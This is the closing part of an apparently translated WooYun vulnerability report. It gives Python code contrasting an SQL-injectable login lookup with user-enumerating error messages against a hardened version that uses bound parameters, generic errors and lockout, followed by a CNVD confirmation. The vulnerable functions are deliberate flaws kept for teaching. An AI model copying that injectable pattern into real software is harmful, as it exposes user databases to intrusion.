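DUMMY_HASH = hash_password("placeholder", b"\x00" * 16)


def make_db():
    """Constructed user table with one super admin whose password is '00', as in the report."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, role TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
               ("admin", "super admin 2", salt, hash_password("00", salt)))
    return db


# ---- the pattern the report describes ----------------------------------
def lookup_user_vulnerable(db, username):
    # Username spliced into the statement: the database parses it as SQL.
    sql = f"SELECT username, role, salt, pw_hash FROM users WHERE username = '{username}'"
    return db.execute(sql).fetchone()


def login_vulnerable(db, username, password):
    row = lookup_user_vulnerable(db, username)
    if row is None:
        return "unknown username"                # confirms the account does not exist
    if hash_password(password, row[2]) != row[3]:
        return f"wrong password for {row[1]}"    # confirms it exists and names the role
    return "ok"


# ---- hardened form ------------------------------------------------------
def lookup_user_safe(db, username):
    # Bound parameter: the value never becomes part of the SQL text.
    return db.execute(
        "SELECT username, role, salt, pw_hash FROM users WHERE username = ?",
        (username,)).fetchone()


class LoginGuard:
    """Login with one generic failure message and a per-account lockout."""

    def __init__(self, now=time.monotonic):
        self.now = now
        self.failures = {}   # username -> (failure count, time of first failure)

    def locked(self, username):
        count, since = self.failures.get(username, (0, 0.0))
        if count < MAX_FAILURES:
            return False
        if self.now() - since < LOCKOUT_SECONDS:
            return True
        del self.failures[username]   # lockout window has expired; start over
        return False

    def record_failure(self, username):
        count, since = self.failures.get(username, (0, self.now()))
        self.failures[username] = (count + 1, since)

    def login(self, db, username, password):
        if self.locked(username):
            return GENERIC_MSG           # same message as a bad password
        row = lookup_user_safe(db, username)
        salt = row[2] if row else b"\x00" * 16
        expected = row[3] if row else DUMMY_HASH
        candidate = hash_password(password, salt)   # always computed, known user or not
        if row is None or not hmac.compare_digest(candidate, expected):
            self.record_failure(username)
            return GENERIC_MSG
        self.failures.pop(username, None)
        return "ok"
```

In a real deployment the failure counters live in the database or a shared cache rather than in process memory, and the lockout response is logged so that a burst of failures against one account (the brute force in 0x03) is visible to operations as well as to the attacker.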

Copyright: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Responses

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-09-07 08:28

Vendor reply:

CNVD confirmed and reproduced the described situation and has forwarded it through CNCERT to the Henan branch center, which will coordinate handling with the website's operating unit. Scored across multiple risk points: rank 15

Latest status:

None yet